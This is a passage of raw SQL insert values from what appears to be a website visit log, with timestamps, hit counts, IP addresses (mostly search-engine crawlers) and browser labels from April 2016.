4,0,0,'69.30.234.2','other'),(32919,1459818017,1,1,0,0,'217.69.133.216','other'),(32920,1459818081,1,1,0,0,'217.69.133.224','other'),(32921,1459818219,1,1,0,0,'40.77.167.49','other'),(32922,1459818243,1,1,0,0,'217.69.136.210','other'),(32923,1459818708,1,1,0,0,'130.193.51.19','other'),(32924,1459818739,1,0,1,0,'66.249.64.223',''),(32925,1459818775,3,3,0,0,'136.243.5.87','other'),(32926,1459819047,4,4,0,0,'144.76.61.21','other'),(32927,1459819234,1,1,0,0,'151.80.31.155','other'),(32928,1459819242,1,1,0,0,'217.69.133.227','other'),(32929,1459819299,1,1,0,0,'51.255.65.66','other'),(32930,1459819329,1,1,0,0,'141.8.142.67','other'),(32931,1459819977,3,3,0,0,'217.69.133.232','other'),(32932,1459819978,1,1,0,0,'217.69.133.231','other'),(32933,1459820037,3,3,0,0,'141.8.183.25','other'),(32934,1459820161,1,0,1,0,'66.249.64.150',''),(32935,1459820381,1,1,0,0,'141.8.142.62','other'),(32936,1459820436,2,2,0,0,'141.8.132.105','other'),(32937,1459820441,1,1,0,0,'5.255.253.9','other'),(32938,1459820468,1,1,0,0,'141.8.142.85','other'),(32939,1459820472,1,1,0,0,'141.8.142.10','other'),(32940,1459820487,1,1,0,0,'93.158.152.51','other'),(32941,1459820495,1,1,0,0,'5.255.253.47','other'),(32942,1459820499,2,2,0,0,'5.255.253.53','other'),(32943,1459820525,2,2,0,0,'141.8.132.97','other'),(32944,1459820544,3,1,2,0,'66.249.64.228',''),(32945,1459820787,2,0,2,0,'66.249.64.223',''),(32946,1459820889,1,1,0,0,'66.249.64.223','other'),(32947,1459821010,1,1,0,0,'130.193.51.102','other'),(32948,1459821028,2,0,2,0,'68.180.231.29',''),(32949,1459821037,3,3,0,0,'178.154.189.37','other'),(32950,1459821041,1,1,0,0,'5.255.253.67','other'),(32951,1459821045,2,2,0,0,'5.255.253.113','other'),(32952,1459821062,2,2,0,0,'130.193.51.19','other'),(32953,1459821067,2,2,0,0,'130.193.50.34','other'),(32954,1459821072,2,2,0,0,'93.158.152.40','other'),(32955,1459821081,2,2,0,0,'178.154.149.10','other'),(32956,1459821089,3,3,0,0,'93.158.152.61','other'),(32957,1459821093,2,2,0,0,'141.8.132.101','other'),(32958,1459821117,1,1,0,0,'130.193.51.83','other'),(32959,1459821131,1,1,0,0,'141.8.132.10','other'),(32960,1459821150,1,1,0,0,'141.8.142.25','other'),(32961,1459821173,1,1,0,0,'141.8.132.41','other'),(32962,1459821196,1,1,0,0,'130.193.50.6','other'),(32963,1459821224,1,1,0,0,'141.8.142.58','other'),(32964,1459821228,1,1,0,0,'130.193.51.79','other'),(32965,1459821259,1,1,0,0,'141.8.183.25','other'),(32966,1459821320,2,0,2,0,'66.249.64.233',''),(32967,1459821494,1,1,0,0,'217.69.133.69','other'),(32968,1459821495,1,1,0,0,'217.69.133.232','other'),(32970,1459821878,1,1,0,0,'130.193.51.14','other'),(32971,1459822064,1,1,0,0,'217.69.133.225','other'),(32972,1459822186,1,1,0,0,'93.158.152.51','other'),(32973,1459822354,1,0,1,0,'66.249.64.228',''),(32974,1459822536,1,1,0,0,'217.69.133.215','other'),(32976,1459822597,1,1,0,0,'164.132.161.25','other'),(32977,1459822695,1,1,0,0,'164.132.161.66','other'),(32978,1459822706,1,1,0,0,'5.255.253.113','other'),(32979,1459822733,1,0,1,0,'66.249.64.233',''),(32980,1459822984,1,1,0,0,'217.69.133.217','other'),(32981,1459823058,1,1,0,0,'8.29.198.26','other'),(32982,1459823065,1,1,0,0,'178.154.189.37','other'),(32983,1459823181,1,1,0,0,'207.46.13.17','other'),(32984,1459823562,1,1,0,0,'141.8.142.62','other'),(32985,1459823765,1,1,0,0,'66.249.64.223','other'),(32986,1459823776,1,1,0,0,'217.69.133.221','other'),(32987,1459823841,1,1,0,0,'66.249.89.118','other'),(32988,1459823863,1,1,0,0,'164.132.161.47','other'),(32989,1459823903,1,1,0,0,'51.255.65.24','other'),(32990,1459824114,1,1,0,0,'141.8.132.105','other'),(32991,1459824250,1,1,0,0,'217.69.133.219','other'),(32992,1459824492,1,0,1,0,'66.249.64.150',''),(32993,1459824605,46,46,0,0,'207.46.13.17','other'),(32994,1459824622,2,2,0,0,'217.69.133.70','other'),(32995,1459824623,1,1,0,0,'217.69.133.235','other'),(32996,1459824624,1,1,0,0,'217.69.133.239','other'),(32998,1459824625,1,1,0,0,'217.69.133.236','other'),(32999,1459824635,21,21,0,0,'207.46.13.139','other'),(33000,1459824672,38,38,0,0,'207.46.13.123','other'),(33001,1459824713,55,55,0,0,'207.46.13.27','other'),(33002,1459824807,2,2,0,0,'141.8.184.11','other'),(33003,1459824974,1,1,0,0,'217.69.133.69','other'),(33005,1459824975,1,1,0,0,'217.69.133.230','other'),(33007,1459824976,1,0,1,0,'66.249.64.223',''),(33008,1459825091,1,1,0,0,'93.158.152.61','other'),(33009,1459826041,1,1,0,0,'141.8.142.85','other'),(33010,1459826210,1,1,0,0,'92.113.135.204','opera'),(33011,1459826380,1,1,0,0,'151.80.41.169','other'),(33012,1459826644,1,1,0,0,'141.8.184.11','other'),(33013,1459826748,1,0,1,0,'68.180.231.29',''),(33014,1459827006,1,1,0,0,'217.69.133.232','other'),(33015,1459827007,1,0,1,0,'66.249.64.233',''),(33016,1459827269,1,1,0,0,'141.8.142.61','other'),(33017,1459827926,1,1,0,0,'130.193.50.34','other'),(33018,1459827930,1,1,0,0,'130.193.51.45','other'),(33019,1459827935,1,1,0,0,'5.255.253.113','other'),(33020,1459827939,1,1,0,0,'130.193.51.83','other'),(33021,1459827999,1,1,0,0,'207.46.13.17','other'),(33022,1459828044,1,0,1,0,'66.249.64.162',''),(33023,1459828061,2,1,1,0,'66.249.64.233',''),(33024,1459828228,3,0,3,0,'66.249.64.228',''),(33025,1459828609,1,1,0,0,'5.255.253.9','other'),(33026,1459828613,1,1,0,0,'93.158.152.51','other'),(33027,1459828617,1,1,0,0,'141.8.142.85','other'),(33028,1459828639,2,2,0,0,'217.69.133.219','other'),(33029,1459828640,1,1,0,0,'217.69.133.218','other'),(33031,1459828790,1,0,1,0,'66.249.64.223',''),(33032,1459828798,2,0,2,0,'68.180.231.29',''),(33033,1459829190,1,1,0,0,'217.69.133.221','other'),(33034,1459829254,2,2,0,0,'141.8.132.52','other'),(33035,1459829279,4,4,0,0,'51.254.215.145','other'),(33036,1459829679,1,1,0,0,'141.8.184.22','other'),(33037,1459829690,1,1,0,0,'141.8.132.2','other'),(33038,1459829710,1,1,0,0,'217.69.133.217','other'),(33039,1459829723,1,1,0,0,'130.193.51.81','other'),(33040,1459829728,1,1,0,0,'141.8.142.10','other'),(33041,1459829732,1,1,0,0,'130.193.50.4','other'),(33042,1459829742,1,1,0,0,'130.193.51.83','other'),(33043,1459829762,1,1,0,0,'130.193.37.21','other'),(33044,1459829978,1,1,0,0,'164.132.161.45','other'),(33045,1459830111,1,1,0,0,'164.132.161.13','other'),(33046,1459830148,1,1,0,0,'217.69.133.237','other'),(33047,1459830465,1,1,0,0,'141.8.183.25','other'),(33048,1459830617,1,0,1,0,'66.249.64.223',''),(33049,1459830788,1,1,0,0,'217.69.133.227','other'),(33050,1459830860,126,126,0,0,'195.154.200.68','other'),(33051,1459830871,1,1,0,0,'217.69.133.220','other'),(33052,1459830998,1,1,0,0,'141.8.142.61','other'),(33053,1459831449,1,1,0,0,'130.193.51.19','other'),(33054,1459831450,1,1,0,0,'141.8.132.101','other'),(33056,1459831501,1,1,0,0,'217.69.133.229','other'),(33057,1459831813,62,62,0,0,'195.154.200.68','other'),(33058,1459831822,1,0,1,0,'66.249.64.233',''),(33059,1459831860,1,0,1,0,'66.249.64.156',''),(33060,1459831882,1,1,0,0,'130.193.50.34','other'),(33061,1459831883,1,1,0,0,'141.8.183.25','other'),(33062,1459831884,1,1,0,0,'5.255.253.113','other'),(33063,1459832094,1,1,0,0,'130.193.50.4','other'),(33064,1459832095,1,1,0,0,'130.193.37.21','other'),(33065,1459832096,1,1,0,0,'93.158.152.26','other'),(33066,1459832482,3,3,0,0,'130.193.51.43','other'),(33067,1459832483,1,1,0,0,'5.255.253.9','other'),(33068,1459832623,1,0,1,0,'66.249.64.223',''),(33069,1459832629,1,1,0,0,'217.69.133.227','other'),(33070,1459832828,1,1,0,0,'51.255.65.47','other'),(33071,1459832927,1,1,0,0,'217.69.133.222','other'),(33073,1459832928,1,1,0,0,'217.69.133.223','other'),(33074,1459832948,1,1,0,0,'130.193.51.102','other'),(33075,1459833008,1,1,0,0,'78.111.186.16','chrome'),(33076,1459833258,2,2,0,0,'93.158.152.61','other'),(33077,1459833266,2,2,0,0,'141.8.142.85','other'),(33079,1459833268,2,2,0,0,'141.8.142.10','other'),(33080,1459833269,1,1,0,0,'141.8.184.22','other'),(33081,1459833277,1,1,0,0,'130.193.37.7','other'),(33082,1459833287,1,1,0,0,'141.8.142.62','other'),(33083,1459833288,1,1,0,0,'130.193.37.21','other'),(33084,1459833290,1,1,0,0,'141.8.184.11','other'),(33085,1459833498,3,3,0,0,'91.196.178.69','firefox'),(33086,1459833575,2,2,0,0,'91.196.178.69','chrome'),(33087,1459833616,2,0,2,0,'66.249.64.228',''),(33088,1459833759,2,0,2,0,'66.249.64.223',''),(33089,1459833850,1,1,0,0,'141.8.132.10','other'),(33090,1459833909,1,1,0,0,'51.255.65.50','other'),(33091,1459833919,2,2,0,0,'91.196.178.70','other'),(33092,1459833944,1,1,0,0,'8.29.198.25','other'),(33093,1459833950,1,1,0,0,'91.196.178.67','chrome'),(33094,1459834016,1,0,1,0,'66.249.64.150',''),(33095,1459834173,1,1,0,0,'23.101.61.176','other'),(33096,1459834297,1,1,0,0,'130.193.50.34','other'),(33097,1459834371,1,1,0,0,'66.249.89.116','other'),(33098,1459834421,2,2,0,0,'217.69.133.84','other'),(33099,1459834532,1,1,0,0,'66.249.93.225','chrome'),(33100,1459834765,1,1,0,0,'217.69.133.237','other'),(33101,1459834815,1,1,0,0,'66.249.64.156','other'),(33102,1459834844,1,1,0,0,'217.69.133.223','other'),(33103,1459834845,1,1,0,0,'217.69.133.224','other'),(33104,1459834865,1,1,0,0,'141.8.142.58','other'),(33106,1459835314,1,1,0,0,'141.8.132.83','other'),(33107,1459835315,1,1,0,0,'130.193.37.21','other'),(33108,1459835317,1,1,0,0,'207.46.13.139','other'),(33110,1459835493,1,1,0,0,'217.69.133.67','other'),(33111,1459835903,1,1,0,0,'130.193.51.43','other'),(33112,1459836038,1,0,1,0,'66.249.64.228',''),(33113,1459836203,2,2,0,0,'217.69.133.233','other'),(33114,1459836228,2,0,2,0,'68.180.231.29',''),(33115,1459836273,2,0,2,0,'66.249.64.223',''),(33116,1459836461,1,1,0,0,'130.193.50.34','other'),(33117,1459836632,1,1,0,0,'217.69.133.226','other'),(33118,1459836633,1,1,0,0,'217.69.133.220','other'),(33119,1459836634,1,1,0,0,'217.69.133.222','other'),(33120,1459836655,1,1,0,0,'217.69.133.223','other'),(33121,1459837037,5,5,0,0,'178.95.244.84','firefox'),(33122,1459837081,1,1,0,0,'141.8.132.105','other'),(33123,1459837275,1,1,0,0,'91.196.178.40','chrome'),(33124,1459837358,1,1,0,0,'37.53.128.144','firefox'),(33125,1459837464,5,0,5,0,'66.249.64.228',''),(33126,1459837631,2,0,2,0,'66.249.64.223',''),(33127,1459837681,1,1,0,0,'5.255.253.113','other'),(33128,1459838043,1,0,1,0,'66.249.64.162',''),(33129,1459838157,1,1,0,0,'141.8.183.25','other'),(33130,1459838204,2,1,1,0,'66.249.64.233',''),(33131,1459838439,1,1,0,0,'217.69.133.226','other'),(33132,1459838440,1,1,0,0,'217.69.133.220','other'),(33133,1459838541,1,1,0,0,'91.196.178.70','firefox'),(33134,1459838701,1,1,0,0,'94.179.118.198','firefox'),(33135,1459838823,3,3,0,0,'130.193.51.83','other'),(33136,1459838928,2,2,0,0,'176.9.131.69','other'),(33137,1459838939,3,0,3,0,'66.249.64.223',''),(33138,1459839006,1,0,1,0,'66.249.64.228',''),(33139,1459839009,1,0,1,0,'66.249.64.156',''),(33140,1459839319,1,1,0,0,'141.0.15.85','opera'),(33141,1459839436,2,2,0,0,'217.69.133.215','other'),(33142,1459839437,1,1,0,0,'217.69.133.219','other'),(33143,1459839509,2,2,0,0,'130.193.50.34','other'),(33144,1459839684,1,1,0,0,'217.69.133.85','other'),(33145,1459839714,2,2,0,0,'130.193.51.19','other'),(33146,1459839715,2,2,0,0,'141.8.142.58','other'),(33147,1459839721,2,2,0,0,'141.8.132.105','other'),(33148,1459839728,2,2,0,0,'130.193.51.83','other'),(33149,1459839831,1,1,0,0,'217.69.133.238','other'),(33150,1459839832,1,1,0,0,'217.69.133.237','other'),(33151,1459839941,1,1,0,0,'51.255.65.47','other'),(33152,1459840002,1,1,0,0,'217.69.133.218','other'),(33153,1459840122,1,0,1,0,'68.180.231.29',''),(33154,1459840600,1,1,0,0,'141.8.142.67','other'),(33155,1459840871,1,1,0,0,'91.196.178.70','firefox'),(33156,1459841011,1,0,1,0,'66.249.64.228',''),(33157,1459841082,1,1,0,0,'93.73.234.193','firefox'),(33158,1459841244,1,1,0,0,'217.69.133.216','other'),(33159,1459841245,1,1,0,0,'217.69.133.219','other'),(33160,1459841291,1,0,1,0,'66.249.64.233',''),(33161,1459841446,1,1,0,0,'130.193.51.83','other'),(33162,1459841507,1,0,1,0,'68.180.231.29',''),(33163,1459841511,1,1,0,0,'217.69.133.239','other'),(33164,1459841724,1,1,0,0,'164.132.161.42','other'),(33165,1459841725,2,2,0,0,'94.179.105.227','firefox'),(33166,1459841775,1,1,0,0,'91.196.178.70','firefox'),(33167,1459841853,1,1,0,0,'51.255.65.14','other'),(33168,1459842118,1,1,0,0,'130.193.50.34','other'),(33169,1459842200,1,1,0,0,'217.69.133.229','other'),(33170,1459842452,2,1,1,0,'66.249.64.223',''),(33171,1459842805,1,1,0,0,'141.8.183.19','other'),(33172,1459843079,1,0,1,0,'66.249.64.233',''),(33173,1459843130,1,1,0,0,'217.69.133.227','other'),(33174,1459843756,1,1,0,0,'141.8.142.10','other'),(33175,1459843919,1,1,0,0,'37.54.22.131','firefox'),(33176,1459844266,1,1,0,0,'141.0.14.155','opera'),(33177,1459844485,1,1,0,0,'93.158.152.26','other'),(33178,1459844565,1,1,0,0,'91.196.178.70','chrome'),(33179,1459844767,1,0,1,0,'68.180.231.29',''),(33180,1459844776,1,1,0,0,'8.29.198.26','other'),(33181,1459845289,1,1,0,0,'164.132.161.81','other'),(33182,1459845330,1,1,0,0,'217.69.133.226','other'),(33183,1459845368,1,0,1,0,'66.249.64.228',''),(33184,1459845431,1,1,0,0,'66.249.89.116','other'),(33185,1459845456,1,1,0,0,'92.112.225.78','chrome'),(33186,1459845481,1,1,0,0,'178.154.149.11','other'),(33188,1459845588,1,1,0,0,'217.69.133.216','other'),(33189,1459845662,3,3,0,0,'178.203.146.227','other'),(33190,1459845671,1,1,0,0,'217.69.133.67','other'),(33191,1459845672,1,1,0,0,'217.69.133.84','other'),(33192,1459845863,2,0,2,0,'66.249.64.223',''),(33193,1459845920,1,1,0,0,'217.69.133.215','other'),(33194,1459846077,1,1,0,0,'141.0.14.155','opera'),(33195,1459846413,1,1,0,0,'217.69.133.226','other'),(33196,1459846481,1,1,0,0,'178.154.149.11','other'),(33197,1459846687,2,0,2,0,'66.249.64.233',''),(33198,1459846729,1,0,1,0,'66.249.64.150',''),(33199,1459846896,1,1,0,0,'217.69.133.216','other'),(33200,1459846929,3,0,3,0,'68.180.231.29',''),(33201,1459847001,1,0,1,0,'66.249.64.156',''),(33202,1459847178,1,1,0,0,'82.207.49.98','chrome'),(33203,1459847368,1,1,0,0,'130.180.217.29','firefox'),(33204,1459847478,8,8,0,0,'149.202.54.6','other'),(33205,1459847481,1,1,0,0,'178.255.215.95','other'),(33206,1459847521,1,0,1,0,'66.249.64.228',''),(33207,1459847546,1,1,0,0,'141.8.183.19','other'),(33208,1459847547,2,2,0,0,'141.8.142.61','other'),(33210,1459847602,1,1,0,0,'217.69.133.230','other'),(33212,1459847603,1,1,0,0,'217.69.133.227','other'),(33213,1459848262,2,2,0,0,'141.8.183.25','other'),(33214,1459848268,3,3,0,0,'141.8.132.105','other'),(33215,1459848311,1,1,0,0,'93.158.152.84','other'),(33216,1459848315,3,3,0,0,'141.8.142.58','other'),(33217,1459848331,3,3,0,0,'130.193.51.83','other'),(33218,1459848335,1,1,0,0,'130.193.50.34','other'),(33219,1459848392,3,3,0,0,'5.255.253.113','other'),(33220,1459848435,1,1,0,0,'178.95.244.84','firefox'),(33221,1459848442,1,0,1,0,'66.249.64.223',''),(33222,1459848575,1,0,1,0,'66.249.64.162',''),(33223,1459848691,1,0,1,0,'66.249.64.233',''),(33224,1459848703,1,0,1,0,'66.249.64.228',''),(33225,1459848916,1,1,0,0,'66.249.64.228','other'),(33226,1459848965,65,65,0,0,'5.9.28.226','other'),(33227,1459849263,1,1,0,0,'91.196.178.169','opera'),(33228,1459849494,1,1,0,0,'91.196.178.169','chrome'),(33229,1459849653,1,1,0,0,'180.76.15.25','other'),(33230,1459849693,1,1,0,0,'141.0.14.155','opera'),(33231,1459849822,1,1,0,0,'91.196.178.65','chrome'),(33232,1459849956,1,1,0,0,'80.254.155.43','chrome'),(33233,1459850292,5,5,0,0,'207.46.13.123','other'),(33234,1459850293,1,1,0,0,'217.69.133.250','other'),(33235,1459850295,1,1,0,0,'217.69.133.191','other'),(33236,1459850296,7,7,0,0,'207.46.13.17','other'),(33237,1459850316,5,5,0,0,'207.46.13.139','other'),(33238,1459850345,3,1,2,0,'66.249.64.228',''),(33239,1459850347,8,8,0,0,'157.55.39.185','other'),(33240,1459850476,1,1,0,0,'37.52.146.117','chrome'),(33241,1459850520,1,1,0,0,'91.196.178.72','firefox'),(33242,1459850606,1,1,0,0,'66.102.9.86','chrome'),(33243,1459850768,1,1,0,0,'74.91.26.114','firefox'),(33244,1459850894,1,0,1,0,'66.249.64.233',''),(33245,1459850919,1,1,0,0,'217.69.133.225','other'),(33247,1459851223,1,1,0,0,'51.255.65.21','other'),(33248,1459851512,1,1,0,0,'141.0.14.155','opera'),(33249,1459851527,2,2,0,0,'62.173.163.188','other'),(33250,1459851530,1,1,0,0,'62.173.163.188','firefox'),(33251,1459851556,2,0,2,0,'68.180.231.29',''),(33252,1459851923,1,1,0,0,'217.69.133.225','other'),(33253,1459852564,1,0,1,0,'66.249.64.162',''),(33254,1459852760,1,1,0,0,'217.69.133.85','other'),(33256,1459852920,1,1,0,0,'157.55.39.185','other'),(33257,1459853014,1,0,1,0,'66.249.64.223',''),(33258,1459853023,1,0,1,0,'66.249.64.228',''),(33259,1459853255,2,0,2,0,'66.249.64.233',''),(33260,1459853768,1,1,0,0,'217.69.133.231','other'),(33261,1459853769,1,1,0,0,'217.69.133.232','other'),(33262,1459853770,1,1,0,0,'217.69.133.69','other'),(33263,1459854051,1,1,0,0,'217.69.133.220','other'),(33264,1459854068,2,0,2,0,'68.180.231.29',''),(33265,1459854135,1,0,1,0,'66.249.64.228',''),(33266,1459854226,2,0,2,0,'66.249.64.233',''),(33267,1459854323,1,1,0,0,'51.255.65.22','other'),(33268,1459854534,1,1,0,0,'217.69.133.227','other'),(33269,1459855252,198,198,0,0,'5.9.87.111','other'),(33270,1459855758,2,0,2,0,'68.180.231.29',''),(33271,1459855759,1,1,0,0,'51.255.65.56','other'),(33272,1459855779,1,1,0,0,'217.69.133.240','other'),(33273,1459855848,1,1,0,0,'8.29.198.25','other'),(33274,1459855994,1,1,0,0,'91.196.178.103','firefox'),(33275,1459856200,1,0,1,0,'66.249.64.228',''),(33276,1459856382,1,1,0,0,'66.249.89.116','other'),(33277,1459856469,1,1,0,0,'178.95.244.84','firefox'),(33278,1459856852,1,1,0,0,'46.174.240.216','firefox'),(33279,1459856867,1,1,0,0,'217.69.133.215','other'),(33280,1459857043,1,1,0,0,'46.201.240.112','firefox'),(33281,1459857390,1,0,1,0,'66.249.64.233',''),(33282,1459857526,1,1,0,0,'151.80.31.102','other'),(33283,1459857855,1,1,0,0,'217.69.133.220','other'),(33284,1459857964,1,1,0,0,'217.69.133.223','other'),(33286,1459858059,1,1,0,0,'91.196.178.69','chrome'),(33287,1459858286,1,1,0,0,'62.210.215.100','chrome'),(33289,1459858308,1,0,1,0,'66.249.64.150',''),(33290,1459858434,1,1,0,0,'217.69.133.217','other'),(33291,1459858435,1,1,0,0,'217.69.133.218','other'),(33292,1459858603,1,0,1,0,'66.249.64.156',''),(33293,1459858984,1,1,0,0,'217.69.133.228','other'),(33294,1459858985,1,1,0,0,'217.69.133.230','other'),(33296,1459859172,1,1,0,0,'141.0.14.28','opera'),(33297,1459859395,1,1,0,0,'95.132.15.144','chrome'),(33298,1459859516,1,1,0,0,'217.69.133.237','other'),(33299,1459859751,1,1,0,0,'62.210.215.100','chrome'),(33300,1459859782,1,1,0,0,'91.196.178.70','chrome'),(33301,1459860073,1,0,1,0,'66.249.64.233',''),(33302,1459860083,1,1,0,0,'217.69.133.220','other'),(33303,1459860093,2,0,2,0,'66.249.64.228',''),(33304,1459860173,2,0,2,0,'66.249.64.223',''),(33305,1459860208,1,1,0,0,'217.69.133.228','other'),(33306,1459860209,1,1,0,0,'217.69.133.230','other'),(33307,1459860462,1,1,0,0,'217.69.133.233','other'),(33308,1459860625,1,0,1,0,'68.180.231.29',''),(33309,1459860709,1,1,0,0,'176.120.60.156','firefox'),(33310,1459860800,1,1,0,0,'91.196.178.69','firefox'),(33311,1459860981,3,3,0,0,'83.149.126.98','other'),(33312,1459861078,1,1,0,0,'141.0.14.28','opera'),(33313,1459861393,1,0,1,0,'66.249.64.233',''),(33314,1459861579,1,0,1,0,'66.249.64.228',''),(33315,1459861675,1,1,0,0,'217.69.133.217','other'),(33316,1459861796,3,0,3,0,'66.249.64.223',''),(33317,1459861946,1,1,0,0,'91.124.198.80','chrome'),(33318,1459862015,1,1,0,0,'31.43.22.182','firefox'),(33319,1459862068,1,1,0,0,'217.69.133.234','other'),(33320,1459862217,1,0,1,0,'66.249.64.150',''),(33321,1459862470,1,1,0,0,'180.76.15.146','other'),(33322,1459862485,1,1,0,0,'141.8.132.105','other'),(33323,1459862543,1,1,0,0,'91.196.177.17','chrome'),(33324,1459862588,1,1,0,0,'217.69.133.216','other'),(33325,1459862589,1,1,0,0,'217.69.133.219','other'),(33326,1459862648,1,0,1,0,'66.249.64.233',''),(33327,1459862748,1,1,0,0,'178.95.244.84','firefox'),(33328,1459862792,1,0,1,0,'66.249.64.223',''),(33329,1459862861,1,1,0,0,'157.55.39.121','other'),(33330,1459862969,1,1,0,0,'91.196.178.72','firefox'),(33331,1459863092,1,1,0,0,'95.132.15.144','chrome'),(33332,1459863270,1,1,0,0,'37.52.19.224','chrome'),(33333,1459863301,1,1,0,0,'40.78.146.128','other'),(33334,1459863450,1,1,0,0,'141.0.14.28','opera'),(33335,1459863465,1,1,0,0,'178.54.190.249','chrome'),(33336,1459863574,1,1,0,0,'94.179.22.204','chrome'),(33337,1459863768,1,1,0,0,'217.69.133.217','other'),(33338,1459863846,2,2,0,0,'176.38.47.48','firefox'),(33339,1459863895,1,0,1,0,'68.180.231.29',''),(33340,1459864023,1,1,0,0,'91.196.178.69','chrome'),(33341,1459864151,1,1,0,0,'37.55.226.61','opera'),(33342,1459864273,13,0,13,0,'66.249.64.223',''),(33343,1459864277,3,0,3,0,'66.249.64.228',''),(33344,1459864516,1,1,0,0,'141.8.132.105','other'),(33345,1459864520,1,1,0,0,'130.193.50.34','other'),(33346,1459864894,1,1,0,0,'176.241.109.94','firefox'),(33347,1459865382,2,0,2,0,'68.180.231.29',''),(33348,1459865512,1,1,0,0,'217.69.133.230','other'),(33349,1459865559,1,1,0,0,'91.196.178.68','msie'),(33350,1459865977,1,0,1,0,'66.249.64.233',''),(33351,1459866106,1,0,1,0,'66.249.64.228',''),(33352,1459866327,5,0,5,0,'66.249.64.223',''),(33353,1459866417,2,2,0,0,'130.193.50.34','other'),(33354,1459866583,1,1,0,0,'91.196.178.72','firefox'),(33355,1459866822,1,1,0,0,'66.249.64.228','other'),(33356,1459866984,1,1,0,0,'95.134.108.167','chrome'),(33357,1459867024,1,1,0,0,'91.196.179.33','chrome'),(33358,1459867261,1,1,0,0,'66.249.89.118','other'),(33359,1459867499,1,1,0,0,'8.29.198.25','other'),(33360,1459867730,9,9,0,0,'5.9.73.227','other'),(33361,1459867732,1,1,0,0,'207.46.13.123','other'),(33362,1459868168,1,0,1,0,'66.249.64.233',''),(33363,1459868486,2,1,1,0,'66.249.64.223',''),(33364,1459868550,1,1,0,0,'217.69.133.215','other'),(33365,1459868757,1,1,0,0,'46.211.114.150','other'),(33366,1459868815,2,2,0,0,'130.193.50.34','other'),(33367,1459868858,1,0,1,0,'66.249.64.162',''),(33368,1459869100,2,0,2,0,'66.249.64.233',''),(33369,1459869117,1,0,1,0,'66.249.64.150',''),(33370,1459869177,1,1,0,0,'104.45.18.178','other'),(33371,1459869294,1,1,0,0,'217.69.133.227','other'),(33372,1459869426,1,0,1,0,'66.249.64.228',''),(33373,1459869442,2,2,0,0,'66.249.64.223','other'),(33374,1459869476,1,1,0,0,'217.69.133.230','other'),(33375,1459869533,1,1,0,0,'177.8.170.11','chrome'),(33376,1459869538,1,1,0,0,'52.90.248.137','firefox'),(33377,1459869540,1,1,0,0,'183.207.228.117','chrome'),(33378,1459869596,1,1,0,0,'217.69.133.85','other'),(33379,1459869685,1,1,0,0,'62.210.215.100','chrome'),(33380,1459870016,1,1,0,0,'37.115.81.253','other'),(33381,1459870028,1,0,1,0,'66.249.64.162',''),(33382,1459870531,1,1,0,0,'82.145.219.90','opera'),(33383,1459871108,1,1,0,0,'217.69.133.229','other'),(33384,1459871244,1,1,0,0,'217.69.133.234','other'),(33385,1459871245,1,1,0,0,'217.69.133.235','other'),(33386,1459871446,3,0,3,0,'66.249.64.228',''),(33387,1459871597,6,0,6,0,'66.249.64.223',''),(33388,1459871771,1,0,1,0,'66.249.64.162',''),(33389,1459872097,1,1,0,0,'94.179.48.70','firefox'),(33390,1459872268,1,1,0,0,'141.8.132.105','other'),(33391,1459872357,1,1,0,0,'217.69.133.203','other'),(33392,1459872358,1,1,0,0,'217.69.133.2','other'),(33393,1459872450,1,1,0,0,'82.145.219.90','opera'),(33394,1459872722,1,1,0,0,'180.76.15.155','other'),(33395,1459872961,1,1,0,0,'141.8.142.25','other'),(33396,1459872977,1,0,1,0,'66.249.64.233',''),(33397,1459873017,1,1,0,0,'94.179.48.70','firefox'),(33398,1459873070,1,1,0,0,'130.193.50.34','other'),(33399,1459873104,1,0,1,0,'66.249.64.228',''),(33400,1459873128,6,0,6,0,'66.249.64.223',''),(33401,1459873152,1,0,1,0,'66.249.64.162',''),(33402,1459873178,1,1,0,0,'82.145.218.47','other'),(33403,1459873211,2,0,2,0,'66.249.64.156',''),(33404,1459873242,1,1,0,0,'217.69.133.219','other'),(33405,1459873727,1,1,0,0,'217.69.133.239','other'),(33406,1459873950,1,1,0,0,'207.46.13.139','other'),(33407,1459873990,1,1,0,0,'130.193.50.34','other'),(33408,1459874254,1,1,0,0,'217.69.133.219','other'),(33410,1459874390,1,1,0,0,'188.231.214.75','firefox'),(33411,1459874455,10,10,0,0,'95.181.218.232','chrome'),(33412,1459874755,1,0,1,0,'66.249.64.233',''),(33413,1459875184,1,0,1,0,'66.249.64.228',''),(33414,1459875223,1,1,0,0,'157.55.39.185','other'),(33415,1459875270,2,2,0,0,'217.69.133.224','other'),(33416,1459875273,1,1,0,0,'217.69.133.221','other'),(33417,1459875470,1,1,0,0,'141.8.132.83','other'),(33418,1459875582,1,1,0,0,'130.193.50.6','other'),(33419,1459875731,1,1,0,0,'82.145.218.47','opera'),(33420,1459875996,2,1,1,0,'66.249.64.228',''),(33421,1459876235,1,1,0,0,'217.69.133.69','other'),(33422,1459876323,1,1,0,0,'180.76.15.5','other'),(33423,1459876423,1,0,1,0,'66.249.64.223',''),(33424,1459876505,200,200,0,0,'213.239.205.207','other'),(33425,1459876508,2,0,2,0,'66.249.64.233',''),(33426,1459876528,1,1,0,0,'66.249.64.162','other'),(33427,1459876565,1,1,0,0,'178.92.8.182','chrome'),(33428,1459876724,1,1,0,0,'130.193.50.34','other'),(33429,1459877044,1,1,0,0,'91.196.178.65','firefox'),(33430,1459877299,1,0,1,0,'66.249.64.156',''),(33431,1459877601,1,0,1,0,'66.249.64.223',''),(33432,1459877765,1,1,0,0,'151.80.31.103','other'),(33433,1459877861,1,1,0,0,'66.249.89.114','other'),(33434,1459877933,1,1,0,0,'51.255.65.47','other'),(33435,1459878025,3,0,3,0,'66.249.64.233',''),(33436,1459878036,1,1,0,0,'217.69.133.21','other'),(33437,1459878113,1,0,1,0,'68.180.231.29',''),(33438,1459878133,4,0,4,0,'66.249.64.228',''),(33439,1459878202,1,1,0,0,'141.8.132.105','other'),(33440,1459878312,1,1,0,0,'37.52.195.157','chrome'),(33441,1459878329,1,1,0,0,'82.145.209.55','opera'),(33442,1459878330,1,1,0,0,'141.0.14.80','opera'),(33443,1459878619,1,1,0,0,'66.249.93.229','chrome'),(33444,1459878637,1,1,0,0,'94.179.247.188','firefox'),(33445,1459878735,1,1,0,0,'8.29.198.26','other'),(33446,1459878744,6,0,6,0,'66.249.64.223',''),(33447,1459878747,1,0,1,0,'66.249.64.150',''),(33448,1459879055,1,1,0,0,'91.196.178.167','firefox'),(33449,1459879070,1,1,0,0,'151.80.31.175','other'),(33450,1459879123,1,1,0,0,'141.8.132.105','other'),(33451,1459879203,1,0,1,0,'66.249.64.228',''),(33452,1459879318,1,1,0,0,'217.69.133.18','other'),(33453,1459879416,1,1,0,0,'130.193.50.34','other'),(33454,1459